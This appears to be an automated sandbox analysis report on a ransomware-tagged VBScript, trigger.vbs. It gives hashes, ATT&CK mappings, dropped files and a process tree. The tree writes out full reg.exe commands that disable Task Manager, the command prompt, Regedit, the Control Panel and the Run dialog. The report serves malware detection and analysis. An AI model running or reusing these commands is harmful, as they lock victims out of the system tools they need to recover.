886ca837656cbc45324dc73ef71c9a5cb88a0c4b5f70eb5a776eb8add694c0b4

Analysis

max time kernel
143s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
26/07/2024, 12:59

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

trigger.vbs
Size

2KB
MD5

aca12e49d6fd30f6c6466f5ca1a1ad6c
SHA1

d788ddaf5769478174d7ddd927aa63828948f70d
SHA256

886ca837656cbc45324dc73ef71c9a5cb88a0c4b5f70eb5a776eb8add694c0b4
SHA512

f1b6ace6aac6077bf9104e347433306e48f0628086de5b9e4c3930e8a7fe57d6bd6c9f24f424c5b9f51f41fb7655930c39df8be1b05203ce5fc42fcadda2ecfd

Score

9^/10

evasion ransomware

Malware Config

Signatures

Renames multiple (157) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

T1112

pid	Process
1632	reg.exe
1188	reg.exe
4332	reg.exe
3316	reg.exe
3504	reg.exe
1108	reg.exe
1436	reg.exe
952	reg.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3620 wrote to memory of 1188	3620	WScript.exe	84
PID 3620 wrote to memory of 1188	3620	WScript.exe	84
PID 3620 wrote to memory of 4332	3620	WScript.exe	87
PID 3620 wrote to memory of 4332	3620	WScript.exe	87
PID 3620 wrote to memory of 3316	3620	WScript.exe	89
PID 3620 wrote to memory of 3316	3620	WScript.exe	89
PID 3620 wrote to memory of 3504	3620	WScript.exe	91
PID 3620 wrote to memory of 3504	3620	WScript.exe	91
PID 3620 wrote to memory of 1108	3620	WScript.exe	93
PID 3620 wrote to memory of 1108	3620	WScript.exe	93
PID 3620 wrote to memory of 1436	3620	WScript.exe	95
PID 3620 wrote to memory of 1436	3620	WScript.exe	95
PID 3620 wrote to memory of 952	3620	WScript.exe	97
PID 3620 wrote to memory of 952	3620	WScript.exe	97
PID 3620 wrote to memory of 1632	3620	WScript.exe	99
PID 3620 wrote to memory of 1632	3620	WScript.exe	99

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\trigger.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3620
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1188
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
  2⤵
  - Modifies registry key
  PID:4332
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallpaper /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3316
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:3504
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1108
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  - Modifies registry key
  PID:1436
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Control Panel\Mouse /v SwapMouseButtons /t REG_SZ /d 1 /f
  2⤵
  - Modifies registry key
  PID:952
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  - Modifies registry key
  PID:1632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\sh.vbs

Filesize
79B

MD5
9c7e6123e53e2934815230ecb3322366

SHA1
aa2668d966f5c98648786a47d90b5a2fd538ef7a

SHA256
c97fb00a65e02154715ebab5948521244d6572b50e817076b122402b328cbf41

SHA512
6d580274be6202f91fc182ce4a74d689a9f34bde34115611465c4f7c7b40d86f9a9ae70760af1ecbada85d612e0d24fe28714158d247186d2d45b385dd65b8a9

Download Submit
C:\Users\Admin\Desktop\CompareSet.wps.vbs

Filesize
65B

MD5
a1c3de3adc55df288cb4ac22eabbf0f2

SHA1
db571422611275f45b92290e2508bd22f5ca1644

SHA256
8cb8ced1cde768396fdf8055d66489a17d17c3e2d9c5c2b78baacff2988757c5

SHA512
f648f6dbc716d728d134e9272362493f37e6f002dc02441ae59e9ef588ded776619498cc259fdabd6a3a872d4dd9b2ae69cff2b6d9c787333e99ca8a01836b7c

Download Submit